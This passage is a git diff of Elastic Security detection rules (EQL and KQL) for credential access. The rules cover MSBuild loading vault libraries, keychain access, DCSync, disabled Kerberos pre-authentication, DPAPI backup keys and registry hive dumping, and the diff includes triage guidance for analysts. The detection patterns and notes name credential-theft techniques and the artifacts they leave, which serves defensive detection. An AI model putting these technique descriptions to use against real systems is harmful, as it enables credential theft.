"3bc6deaa-fbd4-433a-ae21-3e892f95624f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -56,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credential_dumping_msbuild.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credential_dumping_msbuild.json index 8995c6ba7bb4c..a1f23d621ba05 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credential_dumping_msbuild.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credential_dumping_msbuild.json @@ -14,8 +14,51 @@ ], "language": "eql", "license": "Elastic License v2", - "name": "Microsoft Build Engine Loading Windows Credential Libraries", - "query": "sequence by process.entity_id\n [process where event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [library where dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\")]\n", + "name": "Potential Credential Access via Trusted Developer Utility", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML\nschema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was\nintroduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will\ncompile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass\napplication control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of\ncredential access activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file \nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target\nhost after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5", "severity": "high", @@ -44,5 +87,5 @@ } ], "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credentials_keychains.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credentials_keychains.json index 764d5b5969644..643d4b0a67911 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credentials_keychains.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credentials_keychains.json @@ -11,14 +11,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to Keychain Credentials Directories", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Keychains/*\",\n \"/Library/Keychains/*\",\n \"/Network/Library/Keychains/*\",\n \"System.keychain\",\n \"login.keychain-db\",\n \"login.keychain\"\n ) and\n not process.args : (\"find-certificate\",\n \"add-trusted-cert\",\n \"set-keychain-settings\",\n \"delete-certificate\",\n \"/Users/*/Library/Keychains/openvpn.keychain-db\",\n \"show-keychain-info\",\n \"lock-keychain\",\n \"set-key-partition-list\",\n \"import\",\n \"find-identity\") and\n not process.parent.executable : \"/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Keychains/*\",\n \"/Library/Keychains/*\",\n \"/Network/Library/Keychains/*\",\n \"System.keychain\",\n \"login.keychain-db\",\n \"login.keychain\"\n ) and\n not process.args : (\"find-certificate\",\n \"add-trusted-cert\",\n \"set-keychain-settings\",\n \"delete-certificate\",\n \"/Users/*/Library/Keychains/openvpn.keychain-db\",\n \"show-keychain-info\",\n \"lock-keychain\",\n \"set-key-partition-list\",\n \"import\",\n \"find-identity\") and\n not process.parent.executable :\n (\n \"/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect\",\n \"/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise\",\n \"/opt/jc/bin/jumpcloud-agent\"\n ) and\n not process.executable : \"/opt/jc/bin/jumpcloud-agent\"\n", "references": [ "https://objective-see.com/blog/blog_0x25.html", "https://securelist.com/calisto-trojan-for-macos/86543/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dcsync_replication_rights.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dcsync_replication_rights.json index e1ef3f255d4e5..f2c9f2a7d27d7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dcsync_replication_rights.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dcsync_replication_rights.json @@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via DCSync", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are\nautomatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object\nclass, and object classes and their respective attributes are defined in the Active Directory schema. Objects are\ndefined by the values of their attributes, and changes to attribute values must be transferred from the domain\ncontroller on which they occur to every other domain controller that stores a replica of an affected object. \n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process\nfrom a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used\nlegitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges\nto succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of\nthe Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused\nto grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that\nuse the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent:\nSchema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set).\nIt also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)). \n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller\n(DC) that received the replication request. This will tell you where the AD replication request came from, and if it\ncame from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis \n\n- This activity should not happen legitimately, since replication should be done by Domain Controllers only. Any\npotential benign true positive (B-TP) should be mapped and monitored by the security team. Any account that performs\nthis activity can put the domain at risk for not having the same security standards as computer accounts (which have\nlong, complex, random passwords that change frequently), exposing it to credential cracking attacks (Kerberoasting,\nbrute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If specific credentials were compromised:\n - Reset the password for these accounts and other potentially compromised credentials, like email, business systems,\n and web services.\n- If the entire domain or the `krbtgt` user were compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited\n to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this\ninformation to scope ways that the attacker could use to regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "any where event.action == \"Directory Service Access\" and\n event.code == \"4662\" and winlog.event_data.Properties : (\n\n /* Control Access Rights/Permissions Symbol */\n\n \"*DS-Replication-Get-Changes*\",\n \"*DS-Replication-Get-Changes-All*\",\n \"*DS-Replication-Get-Changes-In-Filtered-Set*\",\n\n /* Identifying GUID used in ACE */\n\n \"*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*89e95b76-444d-4c62-991a-0facbeda640c*\") \n \n /* The right to perform an operation controlled by an extended access right. */\n\n and winlog.event_data.AccessMask : \"0x100\" and\n not winlog.event_data.SubjectUserName : (\"*$\", \"MSOL_*\")\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are\nautomatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object\nclass, and object classes and their respective attributes are defined in the Active Directory schema. Objects are\ndefined by the values of their attributes, and changes to attribute values must be transferred from the domain\ncontroller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process\nfrom a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used\nlegitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges\nto succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of\nthe Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused\nto grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that\nuse the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent:\nSchema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set).\nIt also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)).\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller\n(DC) that received the replication request. This will tell you where the AD replication request came from, and if it\ncame from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- This activity should not happen legitimately, since replication should be done by Domain Controllers only. Any\npotential benign true positive (B-TP) should be mapped and monitored by the security team. Any account that performs\nthis activity can put the domain at risk for not having the same security standards as computer accounts (which have\nlong, complex, random passwords that change frequently), exposing it to credential cracking attacks (Kerberoasting,\nbrute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If specific credentials were compromised:\n - Reset the password for these accounts and other potentially compromised credentials, like email, business systems,\n and web services.\n- If the entire domain or the `krbtgt` user were compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited\n to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this\ninformation to scope ways that the attacker could use to regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "any where event.action == \"Directory Service Access\" and\n event.code == \"4662\" and winlog.event_data.Properties : (\n\n /* Control Access Rights/Permissions Symbol */\n\n \"*DS-Replication-Get-Changes*\",\n \"*DS-Replication-Get-Changes-All*\",\n \"*DS-Replication-Get-Changes-In-Filtered-Set*\",\n\n /* Identifying GUID used in ACE */\n\n \"*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*89e95b76-444d-4c62-991a-0facbeda640c*\")\n\n /* The right to perform an operation controlled by an extended access right. */\n\n and winlog.event_data.AccessMask : \"0x100\" and\n not winlog.event_data.SubjectUserName : (\"*$\", \"MSOL_*\")\n", "references": [ "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", @@ -21,8 +21,36 @@ "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_disable_kerberos_preauth.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_disable_kerberos_preauth.json index 3d72d63489242..f09e9bd47a4a8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_disable_kerberos_preauth.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_disable_kerberos_preauth.json @@ -11,15 +11,28 @@ "language": "kuery", "license": "Elastic License v2", "name": "Kerberos Pre-authentication Disabled for User", - "note": "## Triage and analysis\n\n### Investigating Kerberos Pre-authentication Disabled for User\n\nKerberos pre-authentication is an account protection against offline password cracking. When enabled, a user requesting\naccess to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request\n(AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to\nsuccessfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server\nResponse (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is\nsigned with the user\u2019s password. Microsoft's security monitoring [recommendations](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) state that `'Don't Require Preauth' \u2013 Enabled` should not be enabled for user accounts because it weakens security for the account\u2019s Kerberos authentication.\n\nAS-REP roasting is an attack against Kerberos for user accounts that do not require pre-authentication, which means that\nif the target user has pre-authentication disabled, an attacker can request authentication data for it and get a TGT that\ncan be brute-forced offline, similarly to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Determine if the target account is sensitive or privileged.\n- Inspect the account activities for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- Disabling pre-authentication is a bad security practice and should not be allowed in the domain. The security team\nshould map and monitor any potential benign true positives (B-TPs), especially if the target account is privileged.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the target account's password if there is any risk of TGTs having been retrieved.\n- Re-enable the preauthentication option or disable the target account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nAccount Management > \nAudit User Account Management (Success,Failure)\n```\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Pre-authentication Disabled for User\n\nKerberos pre-authentication is an account protection against offline password cracking. When enabled, a user requesting\naccess to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request\n(AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to\nsuccessfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server\nResponse (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is\nsigned with the user\u2019s password. Microsoft's security monitoring [recommendations](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) state that `'Don't Require Preauth' \u2013 Enabled` should not be enabled for user accounts because it weakens security for the account\u2019s Kerberos authentication.\n\nAS-REP roasting is an attack against Kerberos for user accounts that do not require pre-authentication, which means that\nif the target user has pre-authentication disabled, an attacker can request authentication data for it and get a TGT that\ncan be brute-forced offline, similarly to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Determine if the target account is sensitive or privileged.\n- Inspect the account activities for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- Disabling pre-authentication is a bad security practice and should not be allowed in the domain. The security team\nshould map and monitor any potential benign true positives (B-TPs), especially if the target account is privileged.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the target account's password if there is any risk of TGTs having been retrieved.\n- Re-enable the preauthentication option or disable the target account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.code:4738 and message:\"'Don't Require Preauth' - Enabled\"\n", "references": [ "https://harmj0y.medium.com/roasting-as-reps-e6179a65216b", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738", "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + } + ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -54,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_domain_backup_dpapi_private_keys.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_domain_backup_dpapi_private_keys.json index 11e0861ad950b..23d6a88725288 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_domain_backup_dpapi_private_keys.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_domain_backup_dpapi_private_keys.json @@ -12,14 +12,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation or Modification of Domain Backup DPAPI private key", - "note": "## Triage and analysis\n\nDomain DPAPI Backup keys are stored on domain controllers and can be dumped remotely with tools such as Mimikatz. The resulting .pvk private key can be used to decrypt ANY domain user masterkeys, which then can be used to decrypt any secrets protected by those keys.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\nDomain DPAPI Backup keys are stored on domain controllers and can be dumped remotely with tools such as Mimikatz. The resulting .pvk private key can be used to decrypt ANY domain user masterkeys, which then can be used to decrypt any secrets protected by those keys.", "query": "file where event.type != \"deletion\" and file.name : (\"ntds_capi_*.pfx\", \"ntds_capi_*.pvk\")\n", "references": [ "https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/", "https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -59,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dump_registry_hives.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dump_registry_hives.json index f57fe0d372a24..9fe12c071641a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dump_registry_hives.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dump_registry_hives.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Credential Acquisition via Registry Hive Dumping", - "note": "## Triage and analysis\n\n### Investigating Credential Acquisition via Registry Hive Dumping\n\nDumping registry hives is a common way to access credential information as some hives store credential material.\n\nFor example, the SAM hive stores locally cached credentials (SAM Secrets), and the SECURITY hive stores domain cached\ncredentials (LSA secrets).\n\nDumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nThis rule identifies the usage of `reg.exe` to dump SECURITY and/or SAM hives, which potentially indicates the\ncompromise of the credentials stored in the host.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the credential material was exfiltrated or processed locally by other tools.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes using command line tools like `reg.exe`. Check whether\nthe user is legitamitely performing this kind of activity.\n\n### Related rules\n\n- Registry Hive File Creation via SMB - a4c7473a-5cb4-4bc1-9d06-e4a75adbc494\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Credential Acquisition via Registry Hive Dumping\n\nDumping registry hives is a common way to access credential information as some hives store credential material.\n\nFor example, the SAM hive stores locally cached credentials (SAM Secrets), and the SECURITY hive stores domain cached\ncredentials (LSA secrets).\n\nDumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nThis rule identifies the usage of `reg.exe` to dump SECURITY and/or SAM hives, which potentially indicates the\ncompromise of the credentials stored in the host.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are 